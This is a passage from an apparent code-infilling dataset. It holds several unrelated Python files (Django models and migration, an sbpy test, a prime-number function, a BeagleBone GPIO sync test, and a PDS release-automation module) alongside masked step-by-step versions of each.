UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_profile, sender=User)\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.core.urlresolvers import reverse\nimport datetime\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name= models.CharField(max_length=250)\n technology= models.CharField(max_length=100)\n directory= models.CharField(max_length=500, default=\"NA\")\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name= models.CharField(max_length=250)\n technology= models.CharField(max_length=100)\n username= models.CharField(max_length=100, default=\"NA\")\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n\n def __str__(self):\n return self.name + '-' + self.technology\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n\ndef create_profile(sender, **kwargs):\n if kwargs['created']:\n user_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_profile, sender=User)",
"step-ids": [
7,
8,
11,
14,
15
]
}
|
[
7,
8,
11,
14,
15
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75)),
('total_subscription', models.IntegerField(default=0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MemberSubscription',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('member', models.ForeignKey(to='members.Member')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('subreddit', models.CharField(max_length=200)),
('count', models.IntegerField(default=5)),
],
options={
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='subscription',
unique_together=set([('subreddit', 'count')]),
),
migrations.AddField(
model_name='membersubscription',
name='subscription',
field=models.ForeignKey(to='members.Subscription'),
preserve_default=True,
),
migrations.AddField(
model_name='member',
name='subscription',
field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'),
preserve_default=True,
),
]
|
normal
|
{
"blob_id": "4e383130b185c6147315517d166ffe66be1be40d",
"index": 4577,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('email', models.EmailField(max_length=75)),\n ('total_subscription', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='MemberSubscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('member', models.ForeignKey(to='members.Member')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subreddit', models.CharField(max_length=200)),\n ('count', models.IntegerField(default=5)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='subscription',\n unique_together=set([('subreddit', 'count')]),\n ),\n migrations.AddField(\n model_name='membersubscription',\n name='subscription',\n field=models.ForeignKey(to='members.Subscription'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='member',\n name='subscription',\n field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'),\n preserve_default=True,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
data = Phys.from_sbdb([(n + 1) for n in range(5)])
assert len(data.table) == 5
<|reserved_special_token_1|>
import pytest
from sbpy.data import Phys
from sbpy import bib
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
data = Phys.from_sbdb([(n + 1) for n in range(5)])
assert len(data.table) == 5
<|reserved_special_token_1|>
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
from sbpy.data import Phys
from sbpy import bib
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
# query one object
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
# query several objects
data = Phys.from_sbdb([n+1 for n in range(5)])
assert len(data.table) == 5
|
flexible
|
{
"blob_id": "0bfb089556bfa253bf139f03cd3079ced962d858",
"index": 1021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n data = Phys.from_sbdb([(n + 1) for n in range(5)])\n assert len(data.table) == 5\n",
"step-3": "import pytest\nfrom sbpy.data import Phys\nfrom sbpy import bib\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n data = Phys.from_sbdb([(n + 1) for n in range(5)])\n assert len(data.table) == 5\n",
"step-4": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom sbpy.data import Phys\nfrom sbpy import bib\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n\n # query one object\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n\n # query several objects\n data = Phys.from_sbdb([n+1 for n in range(5)])\n assert len(data.table) == 5\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans % x != 0 for x in known):
ans += 1
known.append(ans)
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans % x != 0 for x in known):
ans += 1
known.append(ans)
return ans
if __name__ == '__main__':
n = int(input('Which one? '))
print(nth_prime(n))
<|reserved_special_token_1|>
#/usr/bin/env python3
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans%x != 0 for x in known):
ans += 1
known.append(ans)
return ans
if __name__ == "__main__":
n = int(input("Which one? "))
print(nth_prime(n))
|
flexible
|
{
"blob_id": "21fb9622add4d19b2914118e3afd3867b2368a50",
"index": 4913,
"step-1": "<mask token>\n",
"step-2": "def nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans % x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\n\n<mask token>\n",
"step-3": "def nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans % x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\n\nif __name__ == '__main__':\n n = int(input('Which one? '))\n print(nth_prime(n))\n",
"step-4": "#/usr/bin/env python3\n\ndef nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans%x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\nif __name__ == \"__main__\":\n n = int(input(\"Which one? \"))\n print(nth_prime(n))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import Adafruit_BBIO.GPIO as GPIO
from pydrs import SerialDRS
import time
import sys
sys.dont_write_bytecode = True
class SyncRecv:
def __init__(self):
self._comport = '/dev/ttyUSB0'
self._baudrate = '115200'
self._epwm_sync_pin = 'GPIO2_23' # Input in BBB perspective
self._sync_in_pin = 'GPIO2_25' # Input in BBB perspective
self._sync_out_pin = 'GPIO1_14' # Output in BBB perspective
self.setup_pins()
def setup_pins(self):
GPIO.setup(self._epwm_sync_pin, GPIO.IN)
GPIO.setup(self._sync_in_pin, GPIO.IN)
GPIO.setup(self._sync_out_pin, GPIO.OUT)
def do_syncrecv_test(self):
drs = SerialDRS()
conn = drs.Connect(self._comport, self._baudrate)
if not conn:
print("Erro conexao serial")
return False
print("Iniciando teste dos receptores de fibra - sync")
print('Desliga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.HIGH) # Desliga transmissor
print('Le receptor sync (Esperado = 1)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if sts_sync_in:
print('Liga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.LOW)
print('Le receptor sync (Esperado = 0)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if not sts_sync_in:
print('DRS desligando todos os transmissores')
drs.ClearPof()
print('Lendo EPWM sync (Esperado = 1)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if sts_epwm_sync:
print('DRS ligando todos os transmissores')
drs.SetPof()
print('Lendo EPWM sync (Esperado = 0)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if not sts_epwm_sync:
drs.Disconnect()
return True
print("Falha receptores sync")
drs.Disconnect()
return False
|
normal
|
{
"blob_id": "c716f43dbe62f662c60653f09be946a27c3fff66",
"index": 8069,
"step-1": "<mask token>\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-3": "<mask token>\nsys.dont_write_bytecode = True\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-4": "import Adafruit_BBIO.GPIO as GPIO\nfrom pydrs import SerialDRS\nimport time\nimport sys\nsys.dont_write_bytecode = True\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-5": "import Adafruit_BBIO.GPIO as GPIO\nfrom pydrs import SerialDRS\nimport time\nimport sys\n\nsys.dont_write_bytecode = True\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23' # Input in BBB perspective\n self._sync_in_pin = 'GPIO2_25' # Input in BBB perspective\n self._sync_out_pin = 'GPIO1_14' # Output in BBB perspective\n\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n\n if not conn:\n print(\"Erro conexao serial\")\n return False\n\n print(\"Iniciando teste dos receptores de fibra - sync\")\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH) # Desliga transmissor\n\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n\n if sts_sync_in:\n\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n\n if not sts_sync_in:\n\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print(\"Falha receptores sync\")\n drs.Disconnect()\n return False\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# encoding: utf-8
'''🤠 PDS Roundup: A step takes you further towards a complete roundup'''
from enum import Enum
from .util import commit, invoke
import logging, github3, tempfile, zipfile, os
_logger = logging.getLogger(__name__)
class Step(object):
'''An abstract step; executing steps comprises a roundup'''
def __init__(self, assembly):
'''Initialize a step with the given ``assembly``'''
self.assembly = assembly
def __repr__(self):
return f'<{self.__class__.__name__}()>'
def execute(self):
raise NotImplementedError('Subclasses must implement ``execute``')
def getRepository(self):
'''Utility: get the name of the GitHub repository'''
return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[1]
def getToken(self):
'''Utility: get the administrative GitHub token'''
return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')
def getOwner(self):
'''Utility: return the owning user/organization of the repository in use'''
return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[0]
class StepName(Enum):
'''Enumerated identifiers for each of the possible steps of a roundup'''
null = 'null'
unitTest = 'unitTest'
integrationTest = 'integrationTest'
changeLog = 'changeLog'
requirements = 'requirements'
docs = 'docs'
build = 'build'
githubRelease = 'githubRelease'
artifactPublication = 'artifactPublication'
docPublication = 'docPublication'
# Common Steps
# ============
#
# The folowing are concrete Step classes that are shared between contexts;
# i.e., they're independent of Python, Maven, etc.
class NullStep(Step):
'''This is a "null" or "no-op" step that does nothing.'''
def execute(self):
pass
# But for development, this sure is handy:
# import pdb;pdb.set_trace()
# import subprocess
# subprocess.run('/bin/sh')
class ChangeLogStep(Step):
'''This step generates a PDS-style changelog'''
_sections = '{"improvements":{"prefix":"**Improvements:**","labels":["Epic"]},"defects":{"prefix":"**Defects:**","labels":["bug"]},"deprecations":{"prefix":"**Deprecations:**","labels":["deprecation"]}}'
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot generate changelog')
return
invoke([
'github_changelog_generator',
'--user',
self.getOwner(),
'--project',
self.getRepository(),
'--output',
'CHANGELOG.md',
'--token',
token,
'--configure-sections',
self._sections,
'--no-pull-requests',
'--issues-label',
'**Other closed issues:**',
'--issue-line-labels',
'high,low,medium'
])
commit('CHANGELOG.md', 'Update changelog')
class RequirementsStep(Step):
'''This step generates a PDS-style requirements file'''
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot generate requirements')
return
argv = [
'requirement-report',
'--format',
'md',
'--organization',
self.getOwner(),
'--repository',
self.getRepository(),
'--output',
'docs/requirements/',
'--token',
token
]
if not self.assembly.isStable():
argv.append('--dev')
generatedFile = invoke(argv).strip()
if not generatedFile:
_logger.warn('🤨 Did not get a requirements file from the requirement-report; will skip it')
return
commit(generatedFile, 'Update requirements')
class DocPublicationStep(Step):
def getDocDir(self):
raise NotImplementedError('Subclasses must implement ``getDocDir``')
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot send doc artifacts to GitHub')
return
github = github3.login(token=token)
repo = github.repository(self.getOwner(), self.getRepository())
# 😮 TODO: There's a race here. This code is looking for the *latest* release, which
# we assume was made by the earlier ``StepName.githubRelease`` step. It's possible someone
# could create another release in between these steps! It'd be better if we fetched the
# release being worked on directly.
tmpFileName = None
try:
release = repo.releases().next() # ← here
# Make a ZIP archive of the docs
fd, tmpFileName = tempfile.mkstemp('.zip')
with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:
for folder, subdirs, filenames in os.walk(self.getDocDir()):
for fn in filenames:
path = os.path.join(folder, fn)
# Avoid things like Unix-domain sockets if they just happen to appear:
if os.path.isfile(path):
zf.write(path, path[len(self.getDocDir()) + 1:])
# Remove any existing ``documentation.zip``
for asset in release.assets():
if asset.name == 'documentation.zip':
asset.delete()
break
# Add the new ZIP file as a downloadable asset
with open(tmpFileName, 'rb') as tmpFile:
release.upload_asset('application/zip', 'documentation.zip', tmpFile, 'Documentation (zip)')
except StopIteration:
_logger.info('🧐 No releases found at all, so I cannot publish documentation assets to them')
return
finally:
if tmpFileName is not None: os.remove(tmpFileName)
|
normal
|
{
"blob_id": "21e86e4719cda5c40f780aca6e56eb13c8c9b8e5",
"index": 988,
"step-1": "<mask token>\n\n\nclass StepName(Enum):\n <mask token>\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-2": "<mask token>\n\n\nclass Step(object):\n <mask token>\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), 